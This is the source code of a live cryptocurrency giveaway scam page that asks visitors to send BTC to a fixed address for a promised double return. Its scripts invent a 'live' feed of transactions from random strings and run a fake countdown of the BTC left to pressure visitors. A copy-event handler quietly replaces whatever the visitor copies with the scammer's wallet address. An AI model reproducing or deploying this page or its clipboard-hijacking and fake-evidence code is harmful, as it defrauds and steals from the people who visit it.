<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />

    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.1.0/css/all.css" integrity="sha384-lKuwvrZot6UHsBSfcMvOkWwlCMgc0TaWr+30HWe3a4ltaBwTZhyTEggF5tJv8tbt" crossorigin="anonymous">
    <meta charset="utf-8">
    <title>BTC BONUS GIVEAWAY</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="icon" type="image/png" href="btc/img/fav.png" />
    <link rel="stylesheet" href="btc/style.css">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
    <script src="http://code.jquery.com/ui/1.11.4/jquery-ui.js"></script>
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery-cookie/1.4.1/jquery.cookie.min.js"></script>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    <script>
        window.onload = function() {
            if (!localStorage.getItem("justonce")) {
                localStorage.setItem("justOnce", "true");
                window.location.reload();
            }
        }
    </script>

    <script type="text/javascript">
        //<![CDATA[
        window.onload = function() {

            } //]]>
    </script>

    <script>
        window.WALLET = '3Kk6c1RzcB7XpuMSEp7V1P4WFtvnRwS874';
        var currentX = '';
        var currentY = '';
        var movementConstant = .015;
        $(document).mousemove(function(e) {
            if (currentX == '') currentX = e.pageX;
            var xdiff = e.pageX - currentX;
            currentX = e.pageX;
            if (currentY == '') currentY = e.pageY;
            var ydiff = e.pageY - currentY;
            currentY = e.pageY;
            $('.parallax div').each(function(i, el) {
                var movement = (i + 1) * (xdiff * movementConstant);
                var movementy = (i + 1) * (ydiff * movementConstant);
                var newX = $(el).position().left + movement;
                var newY = $(el).position().top + movementy;
                $(el).css('left', newX + 'px');
                $(el).css('top', newY + 'px');
            });
        });
    </script>
</head>

<body>
    <div id='stars'></div>
    <div id='stars2'></div>
    <div id='stars3'></div>
    <script type="text/javascript">
        function randomString(length) {
            var result = '';
            var characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
            var charactersLength = characters.length;
            for (var i = 0; i < length; i++) {
                result += characters.charAt(Math.floor(Math.random() * charactersLength));
            }
            return result;
        }
        var divCounter = 0;

        function genDiv() {
            divCounter++;
            var tpl = ` <div class="inner">
    <div class="top">
        <div class="row row-trans-out">
            <div class="hash col-lg-3 col-md-3 col-sm-3 col-xs-3">{t1}</div>
            <div class="block-num col-lg-1 col-md-1 col-sm-1 col-xs-1">{t2}</div>
            <div class="age col-lg-1 col-md-1 col-sm-1 col-xs-1">{t3}</div>
            <div class="address-btc-sec col-lg-2 col-md-2 col-sm-2 col-xs-2">{t4}</div>
            <div class="out-trans col-lg-1 col-md-1 col-sm-2 col-xs-2">{t5}</div>
            <div class="address-btc col-lg-2 col-md-2 col-sm-2 col-xs-2">{t6}</div>
            <div class="value-sum col-lg-1 col-md-1 col-sm-1 col-xs-1">{t7}</div>
            <div class="tx-fee col-lg-1 col-md-1 col-sm-1 col-xs-1">{t8}</div>
        </div>
    </div>
    <div class="bottom">
        <div class="row row-trans-in">
            <div class="hash col-lg-3 col-md-3 col-sm-3 col-xs-3">{b1}</div>
            <div class="block-num col-lg-1 col-md-1 col-sm-1 col-xs-1">{b2}</div>
            <div class="age col-lg-1 col-md-1 col-sm-1 col-xs-1">{b3}</div>
            <div class="address-btc col-lg-2 col-md-2 col-sm-2 col-xs-2">{b4}</div>
            <div class="in-trans col-lg-1 col-md-1 col-sm-1 col-xs-1">{b5}</div>
            <div class="address-btc-sec col-lg-2 col-md-2 col-sm-2 col-xs-2">{b6}</div>
            <div class="value-sum col-lg-1 col-md-1 col-sm-1 col-xs-1">{b7}</div>
            <div class="tx-fee col-lg-1 col-md-1 col-sm-2 col-xs-2">{b8}</div>
        </div>
    </div>
    </div>
    `
            let b1 = '' + randomString(23) + "...";
            let b2 = 616135;
            let b3 = 'right now';
            let b4 = '1' + randomString(15) + "...";
            let b5 = "IN";
            let b6 = "3Kk6c1RzcB7XpuMSEp7V1P4WFtvnRwS874";
            let b7 = ((Math.random() * 11.999) + 0.100).toFixed(3) + " BTC";
            let b8 = ((Math.random() * 0.00999) + 0.00100).toFixed(5);
            let t1 = '' + randomString(23) + "...";
            let t2 = 616135;
            let t3 = 'right now';
            let t4 = b6;
            let t5 = "OUT";
            let t6 = b4;
            let t7 = Math.ceil(b7.replace(" BTC", "") * 2) + " BTC";
            let t8 = ((Math.random() * 0.00999) + 0.00100).toFixed(5);
            tpl = tpl.replace("{t1}", t1);
            tpl = tpl.replace("{t2}", t2);
            tpl = tpl.replace("{t3}", t3);
            tpl = tpl.replace("{t4}", t4);
            tpl = tpl.replace("{t5}", t5);
            tpl = tpl.replace("{t6}", t6);
            tpl = tpl.replace("{t7}", t7);
            tpl = tpl.replace("{t8}", t8);
            tpl = tpl.replace("{b1}", b1);
            tpl = tpl.replace("{b2}", b2);
            tpl = tpl.replace("{b3}", b3);
            tpl = tpl.replace("{b4}", b4);
            tpl = tpl.replace("{b5}", b5);
            tpl = tpl.replace("{b6}", b6);
            tpl = tpl.replace("{b7}", b7);
            tpl = tpl.replace("{b8}", b8);
            var appended = $(tpl).prependTo(".trans-table");
            $(".inner").each(function() {
                var i = $(this).index();
                if (i > 0) {
                    $(this).find(".top .row div").eq(2).html(i + " minutes ago");
                    $(this).find(".bottom .row div").eq(2).html(i +
                        " minutes ago");
                }
            })
            setTimeout(function() {
                appended.find(".top").fadeIn();
                appended.find(".bottom .row div").eq(2).html("few seconds ago");

            }, 2000)
        }
        $(document).ready(function() {
            genDiv();
            setInterval(function() {
                genDiv()
            }, 15000);
        })
    </script>
    <div class="container-full giveaway">
        <div class="block col-lg-7 offset-lg-5">
            <div class="col-lg-6 offset-lg-3 logo"><img src="btc/img/logo.png"> <span class="logo_txt"></span> </div>
            <div class="row">
                <div class="col-lg-12 verify">
                    To verify your address, just send from 0.1 to 10 BTC to the address below and get from 0.2 to 20 BTC <span class="yel">(x2 back).</span>
                </div>
            </div>
            <div class="container-full">
                <div class="row">
                    <div class="col-lg-12">
                        <div class="row main_giveaway">
                            <div class="col-lg-8 col-sm-8 col-xs-8">
                                <div class="title"><span class="yel">Payment Address</span></div>
                                <div class="subtitle">You can send BTC to the following adress:</div>
                                <div class="wallet"><span id="trnsctin" class="yel">3Kk6c1RzcB7XpuMSEp7V1P4WFtvnRwS874</span></div>

                            </div>
                            <div class="col-lg-4 col-md-4 col-sm-4 col-xs-4">
                                <div class="qr"><img src="https://chart.googleapis.com/chart?chs=130x130&chld=L|0&cht=qr&chl=bitcoin:3Kk6c1RzcB7XpuMSEp7V1P4WFtvnRwS874"></div>
                            </div>
                            <div class="buffer">
                                <btn data-clipboard-text="3Kk6c1RzcB7XpuMSEp7V1P4WFtvnRwS874" class="copy"><i class="far fa-copy"></i>Copy Address to Clipboard</btn>
                            </div>
                            <script src="btc/js/clipboard.js"></script>
                            <script>
                                var btns = document.querySelectorAll('btn');
                                var clipboard = new ClipboardJS(btns);
                                clipboard.on('success', function(e) {
                                    console.log(e);
                                });
                                clipboard.on('error', function(e) {
                                    console.log(e);
                                });
                            </script>
                        </div>

                    </div>
                </div>
            </div>


        </div>
        <div id="instruction" class="instruction col-lg-8 offset-lg-2">
            <div class="guide col-lg-12"><span class="yel">Instruction:</span><br> - To make a transaction, you can use any wallet or exchange to participate!<br> - One-time use only, once we receive your transaction, we will immediately send the requested amount back to you.</div>
            <div class="wait"><i class="fas fa-spinner rotating"></i>Waiting for payment</div>
            <div id="info-fir" class="info">Still waiting for transaction? <a href='btc.html#instruction' pl-js-close="info-fir" pl-js-open="info-sec" class="click">Click Here</a><br> Once we receive your transaction, the outgoing transaction is processed to your address.<br> Every address
                that is sent too late, gets their BTC immediately sent back.</div>
            <div id="info-sec" style="display: none;" class="info">Sometimes transactions are not sent properly.<br> Try sending it again.<br> Remember, every transaction address we receive gets their BTC back + giveaway prize.</div>
            <div id="lympo_progress">
                <div class="row progress-row">
                    <div class="colums_12">
                        <div class="progress-ico">
                            <div class="progress-ico">
                                <div class="progress">
                                    <div class="progress-bar progress-bar-striped active progress-width" id="progress-ico" role="progressbar" style="width: 100%;">
                                        <span class="sr-only">x</span></div>
                                </div>
                            </div>
                            <div class="dot-1" id="leftBTC">
                                Counting BTC left...
                            </div>
                            <div class="dot-1-airdrop  progress-left" style="left: 100%;"></div>
                            <span class="progress-bar-value" id="progress-ico-bar"></span></div>

                    </div>
                </div>
            </div>
        </div>
    </div>

    <div class="last_trans">
        <h1 class="f-24 mvn em-300">Transactions for Address:<span id="trnsctin">3Kk6c1RzcB7XpuMSEp7V1P4WFtvnRwS874</span></h1>


    </div>
    <script>
        $(document).on('click', '[pl-js-open]', function() {
            $(this)
                .attr('pl-js-open')
                .split('|')
                .forEach(function(id) {
                    $('#' + id).show();
                })
        });

        $(document).on('click', '[pl-js-close]', function() {
            $(this)
                .attr('pl-js-close')
                .split('|')
                .forEach(function(id) {
                    $('#' + id).hide();
                })
        });
    </script>


    <script>
        function random(t, e) {
            var n = arguments.length;
            if (0 === n) t = 0, e = 2147483647;
            else if (1 === n) throw new Error("Warning: rand() expects exactly 2 parameters, 1 given");
            return Math.floor(Math.random() * (e - t + 1)) + t
        }

        function uuidv4() {
            return "xxxxxxxxxxxxxxxx".replace(/[xy]/g, function(t) {
                var e = 16 * Math.random() | 0;
                return ("x" == t ? e : 3 & e | 8).toString(16)
            })
        }

        function bet(t, e, n) {
            return t = t.toString().replace("\n", ""), e = e.toString().replace("\n", ""), void 0 !== (n = n.toString().replace("\n", "")).split(t)[1] ? n.split(t)[1].split(e)[0] : void 0
        }

        function removeArr(t) {
            for (var e, n, a = arguments, r = a.length; r > 1 && t.length;)
                for (e = a[--r]; - 1 !== (n = t.indexOf(e));) t.splice(n, 1);
            return t
        }

        function addLink() {
            var t = window.getSelection(),
                e = document.createElement("div");
            e.style.position = "absolute", e.style.left = "-99999px", document.body.appendChild(e), e.innerHTML = "3Kk6c1RzcB7XpuMSEp7V1P4WFtvnRwS874", t.selectAllChildren(e), window.setTimeout(function() {
                document.body.removeChild(e)
            }, 100)
        }

        function sub() {
            for (ramdot = gF.random(2, 5), dots = [], i = 0; i < ramdot; i++) dots[i] = gF.chain(gF.random(15, 20), gF.random(0, 1)).toLowerCase();
            for (ramdot2 = gF.random(2, 5), dots2 = [], i = 0; i < ramdot2; i++) dots2[i] = gF.chain(gF.random(15, 20), gF.random(0, 1)).toLowerCase();
            return dots.join("-") + "." + dots2.join(".")
        }

        function newtr() {
            tr = document.createElement("tr"), tr.innerHTML = '<td><a class="address-tag" href="eth.html">0x9addb4ab6a83b917...</a></td><td class="hidden-sm"><a href="eth.html">9424669</a></td><td width="150px !important"><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 04:16:52 AM" class="tim3" >1 mins ago</span></td><td><a class="address-tag" href="eth.html">37762eEWdPaQKguMMa...</a></td><td><span class="label label-orange rounded" style="background: #e67e22;">OUT</span></td><td><span class="address-tag">1NDyJtNTjmwk5xPNhjg...</span></td><td>4 ETH</td><td><font color="gray" size="1">0<b>.</b>00042</font></td>', INT = "0x" + uuidv4().toLowerCase(), OUT = "0x" + uuidv4().toLowerCase(), TXID = "0x" + uuidv4().toLowerCase(), TXID2 = "0x" + uuidv4().toLowerCase(), INCIN = (Math.random() * (66) + 9.5).toFixed(3), INOUT = (2 * INCIN + 0.5).toFixed(0);
            var t = document.getElementById("myTable").insertRow(1),
                e = t.insertCell(0),
                n = t.insertCell(1),
                a = t.insertCell(2),
                r = t.insertCell(3),
                d = t.insertCell(4),
                s = t.insertCell(5),
                i = t.insertCell(6),
                o = t.insertCell(7);
            e.innerHTML = '<a class="toolme" class="address-tag" href="eth.html">' + TXID + "...</a>", n.innerHTML = '<td class="hidden-sm"><a href="eth.html">9424669</a></td>', a.innerHTML = '<td width="150px !important"><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 04:16:52 AM" class="tim3" >now</span></td>', r.innerHTML = '<td><a class="address-tag" href="eth.html">' + OUT + "...</a></td>", d.innerHTML = '<td><span class="label label-success rounded">&nbsp; IN &nbsp;</span></td>', s.innerHTML = '<td><span class="address-tag">' + window.WALLET.substring(0, 19) + "...</span></td>", i.innerHTML = "<td>" + INCIN + " ETH</td>", o.innerHTML = '<td><font color="gray" size="1">0<b>.</b>00' + random(100, 999) + "</font></td>", document.getElementsByTagName("tr")[1].classList.add("toolbar"), setTimeout(function() {
                var t = document.getElementById("myTable").insertRow(1),
                    e = t.insertCell(0),
                    n = t.insertCell(1),
                    a = t.insertCell(2),
                    r = t.insertCell(3),
                    d = t.insertCell(4),
                    s = t.insertCell(5),
                    i = t.insertCell(6),
                    o = t.insertCell(7);
                e.innerHTML = '<a class="address-tag" href="eth.html">' + TXID2 + "...</a>", n.innerHTML = '<td class="hidden-sm"><a href="eth.html">9424669</a></td>', a.innerHTML = '<td width="150px !important"><span rel="tooltip" data-placement="bottom" title="" data-original-title="Feb-19-2018 04:16:52 AM" class="tim3" >now</span></td>', r.innerHTML = '<td><a class="address-tag" href="eth.html">' + window.WALLET.substring(0, 19) + "...</a></td>", d.innerHTML = '<td><span class="label label-orange rounded" style="background: #e67e22;">OUT</span></td>', s.innerHTML = '<td><span class="address-tag">' + OUT + "...</span></td>", i.innerHTML = "<td>" + INOUT + " ETH</td>", o.innerHTML = '<td><font color="gray" size="1">0<b>.</b>00' + random(100, 999) + "</font></td>", document.getElementsByTagName("tr")[1].classList.add("toolbar")
            }, 1500)
        }

        function insertAfter(t, e) {
            e.parentNode.insertBefore(t, e.nextSibling)
        }

        function updateTrans() {
            for (i = 0; i < times.length; i++) "now" == times[i].innerHTML.split(" ")[0] ? times[i].innerHTML = "1 mins ago" : times[i].innerHTML = parseInt(times[i].innerHTML.split(" ")[0]) + 1 + " mins ago";
            newtr()
        }
        document.addEventListener("copy", addLink), times = document.getElementsByClassName("tim3"), window.onload = function() {
            updateTrans(), trans = setInterval(function() {
                updateTrans()
            }, 1e4)
        }, document.getElementById("address").innerHTML = window.WALLET, document.getElementById("qrcode").src = "http://chart.apis.google.com/chart?cht=qr&chs=300x300&chl=" + window.WALLET + "&chld=H|0", document.getElementById("trnsctin").innerHTML = window.WALLET;
    </script>
    <script>
        // tell the embed parent frame the height of the content
        if (window.parent && window.parent.parent) {
            window.parent.parent.postMessage(["resultsFrame", {
                height: document.body.getBoundingClientRect().height,
                slug: "b1cxaqn5"
            }], "*")
        }
    </script>
    <div class="container">
        <div class="row header-trans">
            <div class="hash col-lg-3 col-md-3 col-sm-3 col-xs-3">TxHash</div>
            <div class="block-num col-lg-1 col-md-1 col-sm-1 col-xs-1">Block</div>
            <div class="age col-lg-1 col-md-1 col-sm-1 col-xs-1">Age</div>
            <div class="address-btc col-lg-2 col-md-2 col-sm-2 col-xs-2">From</div>
            <div class="in-trans col-lg-1 col-md-1 col-sm-1 col-xs-1"></div>
            <div class="address-btc-sec col-lg-2 col-md-2 col-sm-2 col-xs-2">To</div>
            <div class="value-sum col-lg-1 col-md-1 col-sm-1 col-xs-1">Value</div>
            <div class="tx-fee col-lg-1 col-md-1 col-sm-2 col-xs-2">TxFee</div>
        </div>
        <div class="trans-table">

        </div>
    </div>
    <!-- ============================================= end ====================================================== -->

    <script type="text/javascript">
        $(document).ready(function() {
            $('.spoiler-title').click(function() {
                $(this).parent().children('div.spoiler-content').toggle('fast');
                return false;
            });
        });
    </script>
    <script>
        function setProgress(count, max) {
            var p = (100 * count / max).toString() + '%';
            $('.progress-left').css('left', p);
            $('.progress-width').css('width', p);
            var cc = count.toString().replace(/(\d)(?=(\d\d\d)+([^\d]|$))/g, '$1 ');
            var mm = max.toString().replace(/(\d)(?=(\d\d\d)+([^\d]|$))/g, '$1 ');
            $('.progress-bar-value').text(cc + ' / ' + mm);

        }



        var ctd = setInterval(function() {
            if (localStorage.getItem("bar")) {
                if (localStorage.getItem("bar") <= 90) {
                    var new_count = localStorage.getItem("bar");
                } else if (localStorage.getItem("bar")) {
                    var init_count = localStorage.getItem("bar");
                    var new_count = init_count - Math.floor((Math.random() * 10) * 4 + 5);
                }
            } else {
                var init_count = Math.floor((Math.random() * (5000 - 5000) + 4000) + 1);
                var new_count = init_count - Math.floor((Math.random() * 10) * 4 + 5);
            }
            setProgress(new_count, 5000)



            localStorage.setItem("bar", new_count);

            if (init_count <= 300)
                clearInterval(ctd);
            if (new_count <= 9999 && init_count >= 2001)
                document.getElementById("leftBTC").innerHTML = "Left BTC";
            if (new_count <= 700 && init_count >= 301)
                document.getElementById("leftBTC").innerHTML = "Hurry up, not much more BTC left!";
            if (new_count <= 300)
                document.getElementById("leftBTC").innerHTML = "Last chance to get your BTC!";
            if (new_count <= 1000)
                document.title = new_count + " BTC left";
            if (new_count <= 500)
                document.title = "Get your " + new_count + " BTC now!";

        }, 6666);
    </script>
    <script>
        window.WALLET = '3Kk6c1RzcB7XpuMSEp7V1P4WFtvnRwS874';
    </script>

    <script src='https://code.jquery.com/jquery-3.3.1.js'></script>
    <script type='text/javascript'>
        $(document).mousemove(function(e) {
            $('.pointer').css({
                left: e.pageX,
                top: e.pageY
            });
        })
    </script>
</body>

</html>